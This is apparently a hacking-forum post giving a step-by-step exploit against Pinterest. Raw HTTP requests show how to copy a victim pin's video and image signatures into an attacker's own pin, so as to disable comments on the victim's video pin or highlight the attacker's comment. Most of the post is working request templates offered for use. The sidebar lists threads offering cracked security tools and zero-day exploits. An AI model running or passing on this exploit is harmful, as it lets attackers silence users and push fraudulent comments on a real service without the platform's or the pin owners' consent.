Pinterest Exploit: Disable Video Pin Comments & Highlight Attacker's Comment
by erjdfrqowe - Monday November 18, 2024 at 02:56 PM
#1
--- using a web proxy (mitmproxy, burpsuite, fiddler, caido), send GET pinterest.com/pin/{victim_pin_id}


GET /pin/{victim_pin_id}/ HTTP/1.1
Host: pinterest.com




--- save "video_signature":"aaaabbbbccccddddeeee" & "image_signature_adjusted":"ppppttttyyyyuuuuzzzz" from HTTP response

--- create video pin and capture following HTTP request


POST /resource/StoryPinResource/create/ HTTP/1.1
Host: pinterest.com

source_url=/pin-creation-tool/&data={"options":{"alt_text":"","allow_shopping_rec":true,"description":"","is_comments_allowed":true,"is_removable":false,"is_unified_builder":true,"link":"","orbac_subject_id":"","story_pin":"{\"metadata\":{\"pin_title\":\"\",\"pin_image_signature\":\"hhhhjjjjkkkklllloooo\",\"canvas_aspect_ratio\":0.56},\"pages\":[{\"blocks\":[{\"block_style\":{\"height\":100,\"width\":100,\"x_coord\":0,\"y_coord\":0},\"tracking_id\":\"\",\"video_signature\":\"uuuukkkkjjjjttttvvvv\",\"type\":3}],\"clips\":[{\"clip_type\":1,\"end_time_ms\":-1,\"is_converted_from_image\":false,\"source_media_height\":568,\"source_media_width\":320,\"start_time_ms\":-1}],\"layout\":0,\"style\":{\"background_color\":\"#FFFFFF\"}}]}","user_mention_tags":"[]"},"context":{}}


--- send following request changing a body parameter of capture request


POST /resource/StoryPinResource/create/ HTTP/1.1
Host: pinterest.com

source_url=/pin-creation-tool/&data={"options":{"alt_text":"","allow_shopping_rec":true,"description":"","is_comments_allowed":true,"is_removable":false,"is_unified_builder":true,"link":"","orbac_subject_id":"","story_pin":"{\"metadata\":{\"pin_title\":\"\",\"pin_image_signature\":\" ppppttttyyyyuuuuzzzz\",\"canvas_aspect_ratio\":0.56},\"pages\":[{\"blocks\":[{\"block_style\":{\"height\":100,\"width\":100,\"x_coord\":0,\"y_coord\":0},\"tracking_id\":\"\",\"video_signature\":\"aaaabbbbccccddddeeeee\",\"type\":3}],\"clips\":[{\"clip_type\":1,\"end_time_ms\":-1,\"is_converted_from_image\":false,\"source_media_height\":568,\"source_media_width\":320,\"start_time_ms\":-1}],\"layout\":0,\"style\":{\"background_color\":\"#FFFFFF\"}}]}","user_mention_tags":"[]"},"context":{}}


--- visit your video pin that created with victims video_signature,image_signature_adjusted
--- disable comment of your video pin or create comment and highlight it
--- exploit is impacted on pinterest.com/pin/{victim_pin_id}/

This vulnerability allows an attacker to disable all comments on any video pin, effectively silencing other users, while simultaneously highlighting fraudulent or malicious comments.
Reply
#2
thans for sharing bro
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  {SECRET} DATABASE OF EXPLOITS lulagain 432 25,409 Today, 12:12 AM
Last Post: fokfdo223
  New Zer0 Day Wordpress A3g00n 79 3,007 Yesterday, 04:09 PM
Last Post: baku
  new wordpress website takeover vuln (video + poc ) zinzeur 314 28,041 Yesterday, 03:54 PM
Last Post: baku
  Google Dorks for finding SQL injection vulnerabilities and other security issues 1yush 66 3,026 Apr 29, 2026, 08:51 PM
Last Post: Yjuddur
  Acunetix Premium Cracked v24 Full Activated A3g00n 22 1,353 Apr 29, 2026, 09:22 AM
Last Post: Usercomplex

Forum Jump:


 Users browsing this forum: 1 Guest(s)